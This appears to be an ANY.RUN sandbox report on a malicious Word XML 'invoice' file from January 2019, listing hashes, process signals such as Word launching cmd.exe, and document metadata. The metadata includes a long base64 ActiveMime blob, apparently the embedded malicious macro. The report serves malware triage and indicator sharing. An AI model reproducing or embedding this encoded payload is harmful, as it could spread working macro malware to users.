analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice-1866321-January

Full analysis: https://app.any.run/tasks/7588a941-0f43-4ec6-9abf-35c66ccd6bdc
Verdict: Malicious activity
Analysis date: January 22, 2019, 15:14:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

10F363CC029940E7D1971766A6170E3D

SHA1:

C7DB5834230B40380E72F9112FEEA4C36E94078D

SHA256:

AE3F3DA8E5059DF17C0461D4A067528D842ABF6C717191260E25ED91292579F9

SSDEEP:

3072:Dae0axORjb9SAjryK0yonOVRVDflFbwgfDJVNM+VaYxq6Algy9:DnukeyKHHlf3bwwc3Yxqd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2680)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2680)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3008)

    • Application launched itself

      • cmd.exe (PID: 2776)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1984)
      • cmd.exe (PID: 2776)

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 2680)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2680)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2680)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRT:
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:597.75pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 214874 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 002F28FB
WordDocumentBodySectPRsidRDefault: 0058084E
WordDocumentBodySectPRsidR: 0058084E
WordDocumentDocPrRsidsRsidVal: 0058084E
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: QWN0aXZlTWltZQAAAfAEAAAA/////wAAB/ARLgAABAAAAAQAAAAAAAAAAAAAAABqAAB4nOx8C3gb 1ZnomRlZlh9yFMdJHBPCWLZjJ35k3o8oCXrZCRDHjh2SAG6wbCmxE9uSJTs2DgmyEiBtaTcU2u1S oE5KW5aPFvPoY/vYKoG9pVy+kiV0P7rbLQ7Qu7T3LpvSF9sHvv85MyMpjgMJ7H5cvu+O9M+cc+ac 8z/Pf/5zNKPTLyycOf54xVk059iAGPTObAGy55RRJpDDhRBt5t+ZnZ21imf///GROv4CsMzUoQ2u FQBY5/kADoACgEKAIoBiACdACcACwwTQQoBSgEUAZQCLAZYALAUoN/t1w/UKgOUAVwKsALgKgAWo BKgC4AB4gBqAlQC1AHUAqwBWA9QDNAA0AjQBrDH7FuAqmul3PlRJfjSPDhSFzwjoohkNwTWObpnr Ct71WILyMmO+6D3qunaJP1n8+EsUA2nvMqNsO/Ij32VhPP9wIIqy8Oe9B17rmnsvjPqB5w+Cn6Zy 5Xmp7WTGuIbAehUA7X3iLwb82A/jsXup+LGcbqo10lgYuD1j9oHvvdv4x2PscsY/VjP2KfONf9wX Hv/YP2AfUI0ub/xzyPAZuB/sAyQAGUABUAGwTHWAtQAegHUA6xGe2xC6GsALgG3PDxAACAI0A7QA bATYBHANwLUmjs3mdQtc2wDazXwHyvqf6830DrjuBLgB4EazrAuuHwPYBXAzQDfC+keoB6AXfTg+ jOKfTFJE8xTiVtP0sQIUK7NvYlCKRuHXbTYwhOWoPR7dG+kdyduKVeKly+x02fqv0YX59ABV5rCX FtClyb3frdq1EBXT15auowuXICqeGAm7ogORDfSyBLgVGGdRNIAi7TCB9KGaXYhZjbo2HuA4TuCm JZFrRA6bLYAKGbqEKuU4STlYhYQmroqrCqxFXTv6h8LRsQTqStySGIkMijahi4kITSMDPaiqbXMz 6xsdSUYHQyP90SHUzSD6cPOWaHwwNJAHiWQgjgZRaGuypQSxyYUFSWp1Q1eAKS20R5KDDuQ7XNm2 e3d/75E9bUG0OwneoDe158G85FX3pio3HhCCLUgLclKgUfajFl8jz/H+xmP+YLOc3OPzJSMVUjJP OLon+Z098RAaZFv6ByKJLm8gOjgYHbLZW1F/bzyaiO4G99rZF4pHwl2oraXlmkAzr6Cu1s62puDm zfaqO12HW1leaeIcbFvP5Gvs5v6e6XgofkuyJomWpMYdrZ0taV9iAyrxJW2tqBO1HPEnqpHohWFL h4MSkoXmZr6xmQtqLRTna9SQrRFxgsJpASnYzvn9koMbc4ZbXm4VuM21/ivZdOz5lW+sgRHh5tMo mKJvzU8dKqYCKY47WMVd6U9VpYuT6EGZQ192JgvuTCNfuSwqfq/o86mNMDwabVIA9WmSzDV6/arc ovrTimgL+o4q1ycicVCSL9h6zZZrDiG+yxeLBUMjKNS1OdobGuhC2yKDsa7t/uanQchqU2Q87Ah/ dh3jdSfR2aZm51/NoArX7U10912tZUVP+d5Y4H+NQYsqT1FJcRmafHVC8+qCtBG8kXMCj20dCUja hirutAt32ZdDcRna5Kf41L89yoCnWOGmJumGE0X/+FyF222rP4GqnCFR2SZqcE37lG6kfbHa6Weq nBuZNc71FWucjnvfrGxyjkmK9Ltq59jUMqhSQypch2scj1X8eF9vRV3eG05XT+4EQi2B3DnsTMCD vgTXzbThiDdC/gtM1skmxR/vw3dw+ijAN3Ga9GS5bWNAovd1uJDhwrH7zkfZMJyiHGZuHBkOfc6R ob/MpP8oZdS/AvJqRS79976J75gsfSj00+/VjYG+tTmXGOtsEPsKyiX2wzxyqbKoJ3koKSptor0X iPb8VZZ1LTbvriB37iJSKiq9l05eZvs157VvYtKX2X7pee33MufzefH21mEjd46Q9jZ0oSHNJ8P0 RcrnynkuDZfS4pWL2NglHe88R8E85590ZBfQkMYsOsw0DqJcRprBARabk+bMOtjmvWYal3/brIPb PmuWPwGXl3P6PEZl+5misvWnjTT6HFzSVLb+Tjpbv89IIxzQjNNZvKfpbD8zZvn9cDlH5+BlsnWm ctLTTA5eJtvnTlsO3pz0uJFG98HlqJnGgV8duAYbpDHKndhNJAuIWLHCLDl352Xl3JeXxRXLy/af zMvSdsysM4BpzsvRiz1bh7Xn6MVIk8DOa8/W/3xO/YfN8hNYX/YsDd352ToxI40+jenJz9ZxOXLs wUijWzFeRxbXtCPbTzonfdqs83Wso5z6xwpy7KEgS/90QRavozDbT3lhtn5dYVYXWmG2/ss59d8w y/Gc9nZOnWRRtp9jOempoqzMp4uydLLFOXLOSXuNNHoYLu3F2fpv59RxOI3y3Zh+M42D9qQzazOn nfPbzMvOrM3MOLP9v+HM8vh2TtpRYtTZj3GVZPk9VpLDo1k+hXksyfbZviDbT7eRxg4TxRZk+yFO wezHZaTRQ1g+rmydZ3PqvJyTfsOsgxcUb5tpFuNamJVDcuH5cshNu02ZHF1otG3HfM2pb/Uzs9Ca sM5B6nNmaPEjEGMMU4skuhoJNAULOY6OQF6jl0FaoQdRhGw3rCP5tXQ/LIHaIJooQL1ru3olheO6 ILcAjQmCrnWNaoLMdTU1dcEC9JvgOyEF37F+nHMisiqwFgWkRgESunoHwxBbRsw8u6aXrYEFzB6z h3hoEGLS0NoiwL6BZpGf3umqhUWNG5Zgo0DXJqC7hdAdBLoxJYe4Br6GdEHaQlkhgg4O6Q1CDbsG 98qg7WsC0P+jsJSthgiQIrjyUCIywsZIuhBtXd8auX7ghpox3qBrPTvk70tsq9tJ7uejfePyhFfY TXqpz+nFhtq37zhk8Ltlv64Erwn3iz0tWzeb/HVqTXvXdHG11yHM0bVmiMSiDuCjnfCxhUZJFm2n dzbUom2Z+11w/0ZyH2aAJOYzFLh51Y0bDx6IDY76qjsaCNXqLSO9nua2tVGpiMhiT7xxeOXK3dE4 W7OJ7R8iNMC6qk7WParkUTyyR5ANWj2Ch+c9Eu8RJY9M6hUjwaOKHkHz8LpHMaQie1Roo8LJ0I5H gjrQDPOyi8Z09mTo7Cb53fROthaF6cVksBCN40aARTVzgo6/imUPHg73qBr2UYQwfhW+slnDYdLA CxhnH0070rd5AM8AwbOXXns9LNFBfnGgI0boGKINvLiRhPsmOQ44J+whg3+CRVQ9Cu4+g0mEj+4x pKFAZc4jiVgcRgmkRcGjeaSMfDwij0mVNI+RVxR8U+WM+yVI9CgariMRjjAHI3Qp0e8E0DtO6N1P 9H8ok7+VyDGV4Sdp6h/IANVwHh70CLST/kGpItAj40KDSicCjETCPMZtSlWSPIIKJaJZsgBWpZhZ BcqgS0UzJUBIB46LTJmpmHhRRRa3Jvc85uQIzQOdR+lySN9Bt6MuGF0suovkPwEj18gfo3cur0Wf NvOGlQFd8MU2achIUvAXaANDK7L44kX8xfV40zIU4EDAZ9nkAfMInCnEuCXJLMVak3nSKTCjW3YF vMrQH/Bg8YrbgTljXj4DvqQJ1u4s8TnX0kWQ2kXOfeQ8Qs5HyPkzNG7RROMN2X7wsVM09q/ejH89 RvT3ecL358BvNUCORfeT/H3Q+1qSPwH6nSL6fZB2E7pVQjXmFxMqEF3ClSdMa5aOShARXEZoBs8a lgAe4aS5aEkCZJWRj8IRD/QQrSMJ8D8C+B8m+L9Cd0H+65n8oyT/BL2zrBZNA70HUYMhQUAHqCU8 MrH8wL54XGBYnYBlCzVUPOosCcOQg0LZpBsUDEpQCHvEgzwFvX8H8H6b4P0mvQfw/j1t+NZa9D26 z8ID7CkeTAO4LLBB6EjgLJvESpWwvRt08IY7gXEBhJhyELGfywrStAgtK0izHqRAViImUdQy/geP OGyJBj5ipMTsMAdpWgZpikD3M2S+PEVjK8cafzbDx/+g15LRZKnB8EeAiyPdmnyAbMFFwXhUDF+D OcasYXaM0YjNGZgX5IwdCNh+BcNGjLLcsSVaXovoxfhgmp8j9vljQu/zmfnmRXqno9ZYSRC/XYh9 BggM+xbci4gNC4SLxWpRqGIGcDXOpJAIUxE8Jk/YmwIloqGbAoTdLdG+JW+ZWCjGAW6GJ/b5Em3Q 888gv5eJ/P6J0PvzzLz/M5J/NRO/zBB/D/7aw2uWlo0xoeSoWDK1rpjDAVixqJQ9hrsRDRlqxNEQ 0Yuyx2ylYz6hM96aP8hokPHUJggZfkQycgU8rwBDJkaRCFGFHkTC4euE/jcy8+b/Ivn/Q+8srkW/ ysgf65sglQRjLGFBwvgxdQ+s8TKuIZDZGNfQPbKE/bdBi0IYAIpA5jAqCeY3Yby9ReKMcxm9/z5D x28JHX8k8dbbGTpgpjB9vkDGtm76As1jznVm7EDmDRCTQDwqplHGYoAmeNrKzKA6NmE8uSvmjGlO l6LlyRRiCqQa4NDM3jEm7DuAE2LDf87Qj5idwVr0TiZvY6x5k2YQkQtQAf1JumGzBp0WfgeeVQGh IJgeSyPTnzkLYXPnsP1gaZtlIFTQhCAR7ahFGU1BiZKJYUw5yB5D43aGRYVMBaQcjEVnCYPng+JM vpTB8YyLseRejIjwTEQYs4T9ECaEiMz0fjD6sedXTWnyeJQqOomWCD9gJNZ8jmcYsAcFT4FYIjqh rYwx8JczVvyxhMH55YS+igx9LIPngxVM1i5I9MCBajEC4tUwzSRewBhkQzYwashAVE2vpZIJnIhZ 0czRlQmQeB1ZEgUHjlnLzGTE92BeM/NbEbYwYhai6ekLMvwa9u4Gua9kLD9STfhazeBxVpfhA8e0 hlAM/4ljX9lgyvLEcDPXSkC/xkDDRmviJfOeaFHmwDGviIcNpqKB4H0Ixt5TJH5Ik/Nz5PwSOb9O zm+S85/J2c7gcxk5u8m5gcF93WvaOY476kjckczEHeVk/AqMta7gCF4lw79E8msZa7xrZHwUgd8g /Kk4DiYxh2rGsBCzC8iKY3UsWvjKimFNDuKDcAxt+j5jkCimQSBrNOcIj8RttWgdocPLYD+zIWNf QZL3Z/SC7R0bgRGgqgrRLkYhAALLlkhcwEMBjsGtuF6yvnLGenRscSJx+iKXaQ15PJWr5JZJby4P ZlxQjHJ5wBy0gF1dm/Ezmwg/WzL5zYwxf5qhNIctqwiPDNXwxZk4Di8jiNlbPhP7WkmzpG+NGTxu ybgGaqFcVi0vI6t4qOMBj6wokAx9zKysmtJuN8f3Ngb7/Q7Gikd3En+0HTjBDxUYYxfIlQg1IpYk 8Raq6f1NmgXRdN4ZHwQzoSatCkdZvJhuj5uz4/rK9nhlZWzr2kM1mxpMKfKVK1f278YL0z0Rw1sN s5rERnr7oqxhUdBo7aFGWTfn5cpba4yf6jAfNwLlXhyVE7/UxYSAbrxv0UP8ZjdzC2pBUbz+JPkw M4T2oAQZm+bOQEs/6XUgkqgb15RVaw8ZMhPE83cPDNx4/6BRhjthnKeg37m7B4hIt4/hEI90vF8C kmwhI7WdnG8k5z4yapsYPF7HS2C82tKmvQ9B/RhAHGsAYD/AOEAT+Il7iQ9oYjBO/LP7BEND/la4 ewggCZACOMIEUSnItRYNMFHoH+924R0fV4m1gU+1fwf5Rkbi/T2jICx2u//mLaFBSKxn3SFRQaLm dha2jA6hXvzLLDusI45T6lY5C9vQENscj0fjrKsjkhhF01si42jEWdir6CJHoVhb70hdXBVtvII6 WJYdEG26jlZfMzRSF3XposQxqydk5YjC2xqGFE2klrBjIi9oaJG7F2X2kNxsPeseEwRk7SJpXU1N zCKUj+ixfopmzb0jr7F5RC8UkLVxRNFOc9PIFt1DO4naHKAw9NO9oiLREooFOof21CUCFMdsGeE5 ngp2JIfCdfsVWZ0Mu0KipE72ug9x46BeujZVnVqFag95jd0iOn+7bU1gkgn0xetEm7RqMkT2iKiU 09wfctSM8XQ+3hxiye5Qyr5vvJvsDE3mUSskv0ivwPtB9IItyNoMcuHdoJSjU2vyGjtByd2jR1WO m/xBR3Q0eRM7KCm8yuzp1RwaL1AJfzQ64K0b5VVeYIr7XYogK6i4s3+IrRsQFZ0OKSI1aXMbm0HI 2g2iG/xXGHtBLrwZlGL2xBtdeCcoPQnjzdY/dMpGNoGQtQtEyymbsQXkNfaAAjYBWds/R8ExpRwQ s6aL9quIChRLXkeymJZVv3B7XVTnxWBTD60EPhvoHInXDTkkmZvsG1Ak7YZTfwWxsMt7hepfJJTD mmwSHa4QPBx4Mh6xgQpvpaptAgdS6OYF74qJnSIv+x5Ole/1lmuVTOt+VeBO5nUOe+N1+yVN9lWH 2kVVllGH28vzv5dOLvUv5ZLe1Fo/k1yWNvZufB6/bRNMvF6YxGhGOZsM4pDX10zbkrTX2Kxovsbj F9ON2LHaipWPT9pV7kgT+Pbk0ju9rSkRcT26zvm+BeNkqG6vJqpu8Zk1oqjenhdVT6m2bTFNlEPB 4xWOUVWv3LhXlsQfhiqmJC8s1vjk2u6afT2L2HUiu0iepH+xVCvxnGpI22xleLtli8ra2LyUXRbO Xqn8hKX55BKth/acXdq9YkeKYsXQcvE1xfPlq/iC47wgnuBb+sfr2BgvCfKRZZJ+h+zbcJJOyIJQ vYsbUjnVvYs9GKlz7eM5jmIGeeEt7jjtFnw1UzW+6+kFz4LnTq5SPOziZPtNfppdzs+Unlgt9456 hpSpZd35/7BNZ5d1L1fy6F1Sbw/ZIfnrJJcu6F6u+ws84lRoFhxlxWtUpZ3tSlf4H0k2fDzwxXr2 S3fVs2PHY/fXs1U3nqTPXlfP+gVbPUsvcxY2D4VL2dufdBY6vtHDcym9/BsxRdDVZEkqcKJqSFU0 6Uur3u4RdfeuV+kkdcrr/XawV/F/cVtoaOohzS9T14zpvBpyuMeSlT1bkitkdie9fAbxf/bwDzUE Vvgav9Lgp9PbDrAR9naNWvnaNysbVq5WSrmzG3iVXheIJti6sKjINYt1/Q4p9MBJekxWpXDCPoKe f21Dz0BdQgzK8snggKqdqnB/YXLdjEu6/SB7PSzK6H89tVCgpCmvd5Jv1lHezzzSkc97A2lNQfZ0 eSValNBF4WTfpkh6vG4/LwjUMW8N16eK0tnPnvzWGP8UL4Rq4mze5GK3v3edqjw91n0CdaULBe53 tMuTrlXY3c/0e8Mn79UgeEkO0LaZEt7zjmCv76G7a6faWOZIISr/Q/I677Kpr2m2w5Vj3hue/uKC qSZfPNnQXT4iqVpgUgv9ZkKVgYOxYkW/p+3cvglN14ZPLu4T9d+seLzeewU3Gyg+Z5/JO2d/0dHd xLahDeuftHumSnxOasdblEd6k/OtHw2d86rpG864afoH1VW+Za4eN+WyQ0A4vXGYLXEW9nUP3r29 sqjfJascf0/9gKYWKiEqMEwlNF7/z+Glg/KLG6ZLpuvar+pc96Z4duXpxfsXe9irzy0M0WfuLX+r TBGqSkTvdV73BnFkGdXlZ88UsG7VUyK1uyevm7y2R9NlZrgSsTvqwook8kcqh0Xp1Kf42wd1B6/r h4t2Kyof2Lrdd8+IIoghKvqwrPJ8tftYmbb4qtlX7eyV5Vf1rp5aSG9inQJ9W8z55HVVMsugq1wV U0vlFxY52eXpEs7JC6VMnL85FpkulxZM7UleIZy7UY0OOxN57aPH9uns3qmq3XdJXM8DJw5rCj+i 26JCb/lmmB76HSonLayBAaf+IVV+dm8yX9qW71s8tbXKsf70Tp51uMKng25K9wzJ53wjK9PDyqnh mYQShKDMMQy++b7AL/yf2nvnkt3yjON0690F3G5ZV32fSupDyoCi+RY/8WBve+PdS8Jv8Jr+GV1O 7I+5f331n8I3Jfcrsa7Ti+mCc13dZY+5Co/f5Htg5oB6/LCeZmZfqpye8K7nbEkGAmFq0dAfzpSz u9E6fSt3Oq865mM+2b485vQknSFFS7lRwH/LSKQuLLilmif36fyZ+4bjgXO3im09msoNr3H/qXtV bEK6t6gqX8jrcExRf5k+LBxZylYeG3ySneTO6bNJJ3fo9UrXQHuJt3F6xUPj/84WCu1XB4o9qHq6 sr3khHiusE/jFt23x/uQQ9GlMr1X1fUrJhsDuwdd33jqlglJvkOhheNfGJQ5abL874e/dMerZUn7 jP3pRond/3v+7gIXpb6kH7sRNY1OzE5r3ddPjT/jbK9Ou7+04Zi+EbAvdT0My9B04d5ot/9kPn93 9w/lx/PTldEWvuyJz0RHNPHLT8YVjRmeCY+x9OPO3WBHwqTTHTo4s0j3zP7aPrL6VWG63MsmetnH ZpbMtu+Il5+uPxd/ayla46Ziy/7lGDtdxl9fy94ssk+9SN3W3bawYgZtjHfDWrDd6TnYWeKpXtDB tzdtfe7FjRNHdO23zmGN04ab3IFhfUDn3R8L639W5MPFMxvOrX76yhOl7COzPc6RrjR1RfU9emyB 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 